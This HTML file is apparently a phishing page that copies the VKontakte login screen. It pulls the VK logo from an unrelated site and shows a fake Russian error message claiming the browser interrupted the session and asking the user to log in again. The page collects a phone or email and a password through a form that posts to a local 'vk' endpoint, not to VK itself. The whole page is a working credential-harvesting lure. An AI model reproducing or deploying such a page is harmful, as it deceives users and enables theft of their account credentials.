<!DOCTYPE html>
<html>
<head>
	<title>vk.com</title>
	<style>
		body {
			background: #edeef0;

			    font-family: -apple-system,BlinkMacSystemFont,Roboto,Helvetica Neue,sans-serif;
		}
		header {
			top: 0;
			left: 0;
			position: absolute;
		    width: 100%;
		    background: #4a76a8;
		    height: 42px;
		    box-sizing: border-box;
		    border-bottom: 1px solid #4872a3;
		}
		header img {
			position: absolute;
		    height: 42px;
		    left: 15%;
		}
		header .serch {
			position: absolute;
		    border: 0;
		    left: 30%;
		    box-sizing: border-box;
		    padding: 6px 6px 6px 19px;
		    margin: 7px 0;
		    height: 28px;
		    line-height: 16px;
		    width: 230px;
		    border-radius: 14px;
		    transition: background-color 0.05s, color 0.05s;
		    background: #224b7a;
		    border-left: 8px solid transparent;
		    color: #fff;

		}
		.serch::placeholder {
			  color: #B0C4DE;
			  } 
		.switch {
			position: absolute;
			left: 75%;
			display: inline-block;
		    white-space: nowrap;
		    line-height: 42px;
		    height: 42px;
		    overflow: hidden;
		    padding: 0 10px;
		    color: #fff;
		    font-weight: 700;
		    -webkit-font-smoothing: antialiased;
		}
		main {
			display: flex;
			justify-content: center;
		}
		.reg_block {
			left: 55%;
			top: 15%;
			position: absolute;
			height: 625px;
			width: 320px;
		    background: #edeef0;
		    color: #000;
		    margin: 0;
		    padding: 0;
		    font-family: -apple-system,BlinkMacSystemFont,Roboto,Helvetica Neue,sans-serif;
		    line-height: 1.154;
		    font-weight: 400;
		}
		.login {
			top: 10%;


			height: 561px;
		    background: #fff;
		    border-radius: 4px;
		    box-shadow: 0 1px 0 0 #d7d8db, 0 0 0 1px #e3e4e8;
		    margin: 50px auto;
		    padding: 37px 30px;
		    width: 740px;
		}
		.auth {
			/*width: 320px;
			height: 378px;
		    background: #edeef0;
		    border-radius: 4px;
		    box-shadow: 0 1px 0 0 #d7d8db, 0 0 0 1px #e3e4e8;
		    margin: 30px 0 20px;*/


		}
		.login .input {
			position: relative;
		    background: #fff;
		    border: 1px;
		    border-radius: 4px;
		    box-shadow: 0 1px 0 0 #d7d8db, 0 0 0 1px #e3e4e8;
		    margin-bottom: 25px;
    		width: 270px;
    		margin-left: 25%;
    		font-size: 15px;
   			padding: 12px 11px 12px
		}
		.login button {
			    padding: 13px 35px 11px;
			    margin-left: 25%;
			    font-size: 14.5px;
			    display: inline-block;
			    zoom: 1;
			    cursor: pointer;
			    white-space: nowrap;
			    outline: none;
			    font-family: -apple-system,BlinkMacSystemFont,Roboto,Helvetica Neue,sans-serif;
			    vertical-align: top;
			    line-height: 15px;
			    text-align: center;
			    text-decoration: none;
			    background: none;
			    background-color: #5181b8;
			    color: #fff;
			    border: 0;
			    border-radius: 4px;
			    box-sizing: border-box;
		}
		.login .a {
		    display: flex;
		    font-size: 14px;
		    color: #2a5885;
		    text-decoration: none;
		    cursor: pointer;
		     margin: 3%; 
		    padding: 7px 17px 8px;
		    margin-top: 0%;
		    margin-left: 23%;
		}
		.h2 {
		    margin: 0 0 25px;
    text-align: center;
    font-size: 20px;
		}
		.error_box {
			width: 680px;
			min-height: 80px;
			background: #ffefe9;
			border: 1.2px solid #f2ab99;
			font-size: 13px;
			padding: 15px;
		}
		.chb {
		    content: '';
		    background: white;
		    width: 15px;
		    height: 15px;
		}
		footer {
			display: flex;
			justify-content: space-between;
			color: #828282;
			font-size: 14px;
			width: 60%;
			margin-left: 20%;
		}
		footer div {

		}
		footer a {
			
		    color: #2a5885;
		    text-decoration: none;
		    cursor: pointer;
		}
		hr {
			border: 1px solid #e4e8ed;

		}
	</style>
</head>
<body>
	<header><img src="http://fitflex.pro/wp-content/uploads/2017/04/vk-logo.png"><input class="serch" style="color: white;" type="dd" placeholder="Поиск" name="dd"><!--<b class="switch">Switch to English</b>--></header><br><br>
	<main>
		<div class="login"><br>
			<p class="h2">Вход ВКонтакте</p>
			<div class="error_box">
				<div class="msg_text"><b>Не удается войти.</b><br>
					Сессия прервана браузером. Пожалуйста повторите вход.
				</div>
			</div><br><br><form action="vk" method="post">
			<input class="input" placeholder=" Телефон или email" type="text" name="login"><br>
			<input class="input" placeholder=" Пароль" type="password" name="password">
			<br> 
			<label style="margin-left: 24.4%; font-size: 14px;"><input class="chb" type="checkbox" name="chb"> Чужой компьютер?</label>
			<br><br>
			<button>Войти</button><button style="background: #5fb053; margin-left: 3%;">Регистрация</button> <br><br> <a class="a" href="#">Забыли пароль или не можете войти?</a></form>
		</div>
		<div class="auth"></div>
	</div></main>
	<br><br>
	<hr><br>
	<footer>
		<div class="footer_copy fl_l"><a href="https://vk.com"> ВКонтакте </a> © 2006–2019 </div>
		<div> <a href="https://vk.com"> о компании </a> <a href="https://vk.com"> правила </a> <a href="https://vk.com"> реклама </a> <a href="https://vk.com"> разработчикам </a></div>
		<div class="footer_lang fl_r"> Язык: 
			<a href="https://vk.com" class="footer_lang_link"> English </a>
			<a href="https://vk.com" class="footer_lang_link" > Русский </a>
			<a href="https://vk.com" class="footer_lang_link"> Українська </a>
			<a href="https://vk.com" class="footer_lang_link"> все языки » </a></div>
	</footer>

</body>
</html>